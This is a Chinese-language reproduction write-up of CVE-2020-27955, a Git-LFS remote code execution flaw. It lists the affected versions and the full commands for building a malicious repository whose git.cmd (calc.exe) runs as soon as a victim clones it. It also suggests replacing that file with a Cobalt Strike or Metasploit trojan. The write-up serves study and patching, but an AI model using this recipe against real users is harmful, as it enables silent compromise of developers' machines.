CVE-2020-27955 Git-LFS远程代码执行漏洞复现

0x01 漏洞简介

Git LFS是Github开发的一个Git扩展，用于实现Git对大文件的支持。Windows平台上的Git-LFS版本<= 2.12上发现远程代码执行问题，一旦受害者克隆了恶意存储库并在其系统上运行了易受攻击的Git-LFS版本，就会立即执行有效载荷，漏洞编号为CVE-2020-27955。

0x02 影响版本

Git<=2.29.2、Git-LFS<=2.12，一些受影响的产品包括Git，GitHub CLI，GitHub Desktop，Visual Studio，GitKraden，SmartGit，Sourcetree等

0x03 漏洞复现

下载并安装≤2.12版本Git-LFS，可通过以下链接安装Windows版Git v2.29.2，Git-LFS版本就是2.12。

• https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

git --version
git-lfs --version

图片

我们先创建一个名为POC的恶意存储库，然后再依次执行以下命令即可，恶意文件名必须命名为git.bat/git.cmd/git.vbs/git.exe。

安装Git-LFS：

sudo apt-get install git-lfs

git clone https://github.com/3had0w/POC.git
echo calc.exe > git.cmd
git lfs track "*.dat"
echo "Junk" > large.dat
git add -A
git commit -m "POC"
git push -u origin master -f

图片

图片

图片

其他更多Windows可执行文件可在环境变量PATHEXT中查看。

图片

完成以上操作后我们的恶意存储库就创建好了，当有人使用git clone克隆该项目时，git.cmd恶意文件就会被下载到本地，并由Git-LFS扩展自动执行，无需交互，执行流程如下图。

图片

图片

如果需要上线至CS/MSF时可以将恶意存储库中的git.cmd恶意文件替换为CS/MSF的二进制木马文件即可，不过还是得命名为git.exe，接着我们重新执行一下git clone就能够正常上线了。

图片

0x04 漏洞修复

更新并保持Git版本高于2.29.2和Git-LFS扩展高于2.12

0x05 参考链接

https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955

https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

https://infosecwriteups.com/git-lfs-exploit-for-remote-code-execution-cve-2020-27955-e8f4786163c3